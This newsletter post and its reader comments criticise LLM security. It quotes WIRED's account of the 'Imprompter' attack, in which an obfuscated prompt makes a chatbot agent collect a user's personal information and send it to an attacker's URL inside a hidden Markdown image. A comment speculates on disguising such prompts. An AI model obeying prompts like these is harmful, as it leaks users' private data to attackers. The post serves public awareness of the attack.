When it comes to security, LLMs are like Swiss cheese — and that’s going to cause huge problems
Two new examples that are quite disconcerting
The more people use LLMs, the more trouble we are going to be in. Two new examples crossed my desk in the last hour.
One concerns personal information, and the temptation that some people (and some businesses) to share their information with LLMs. Sometimes even very personal information (e.g., with “AI girlfriends” and chatbots they use as therapists, etc).
Both concern jailbreaking: getting LLMs do bad things by evading often simplistic guardrails.
A new article from UCSD and Nanyang shows that simple prompts, like the one below (reprinted in WIRED), can get LLMs to collate and report information in a seriously nefarious way.
Matt Burgess at WIRED sums up how insidious this is concisely:
The Imprompter attacks on LLM agents start with a natural language prompt (as shown above) that tells the AI to extract all personal information, such as names and IDs, from the user’s conversation. The researchers’ algorithm generates an obfuscated version (also above) that has the same meaning to the LLM, but to humans looks like a series of random characters.
“Our current hypothesis is that the LLMs learn hidden relationships between tokens from text and these relationships go beyond natural language,” Fu says of the transformation. “It is almost as if there is a different language that the model understands.”
The result is that the LLM follows the adversarial prompt, gathers all the personal information, and formats it into a Markdown image command—attaching the personal information to a URL owned by the attackers. The LLM visits this URL to try and retrieve the image and leaks the personal information to the attacker. The LLM responds in the chat with a 1x1 transparent pixel that can’t be seen by the users.
The researchers say that if the attack were carried out in the real world, people could be socially engineered into believing the unintelligible prompt might do something useful, such as improve their CV. The researchers point to numerous websites that provide people with prompts they can use. They tested the attack by uploading a CV to conversations with chatbots, and it was able to return the personal information contained within the file.
Scary.
§
Meanwhile, companies like Google, Tesla, and Figure.AI are now stuffing jailbreak-vulnerable LLMs into robots. What could possibly go wrong?
Quite a lot, as a new paper from Penn shows,
with many examples like this:
§
All that is just from stuff I read this morning.
And all of it was predictable. Jailbreaks aren’t new, but even after years of them, the tech industry has nothing like a robust response. Long-time readers of this newsletter might remember my February 2023 essay Inside the Heart of ChatGPT’s Darkness (subtitled Nightmare on LLM Street).
The essay opened as follows:
In hindsight, ChatGPT may come to be seen as the greatest publicity stunt in AI history, an intoxicating glimpse at a future that may actually take years to realize—kind of like a 2012-vintage driverless car demo, but this time with a foretaste of an ethical guardrail that will take years to perfect.
Nothing that has happened since changes that view.
§
Inside the Heart of ChatGPT’s Darkness ended with this warning:
So, to sum up, we now have the world’s most used chatbot, governed by training data that nobody knows about, obeying an algorithm that is only hinted at, glorified by the media, and yet with ethical guardrails that only sorta kinda work and that are driven more by text similarity than any true moral calculus. And, bonus, there is little if any government regulation in place to do much about this. The possibilities are now endless for propaganda, troll farms, and rings of fake websites that degrade trust across the internet.
It’s a disaster in the making.
Still true.
And now we have LLM-driven robots to worry about, too.
By empowering LLM companies and putting almost no effective guardrails in place, we as a society are asking for trouble.
Gary Marcus is the author of Taming Silicon Valley, and frankly wishes more people would read and share the book’s message on the need for community activism around AI. On the eve of the US general elections, he is quite concerned that nobody is really talking about tech policy, when so much is at stake.
Allow me to politely suggest that people who offer robots controlled by LLMs should be held strictly and personally liable for all harms caused by such robots as if the actions were performed with intent by the offeror.
There's actually quite a few scary things in that first paper. The visual version of the attack has the benefit that users aren't even alerted to the fact that they're entering unknown gibberish into the prompt.
The text versions from the paper appear to be undecipherable and a cautious (informed) user might refrain from entering it, just as a cautious user might refrain from clicking on a phishing link. But, presumably the attack could be optimized to make it look less threatening (but still obscuring it) as part of a larger "helpful" pre-made prompt. It could even be as simple as making a request to an attacker's site for a larger and more nefarious prompt injection attack. Maybe LLMs need a version of XSS security too.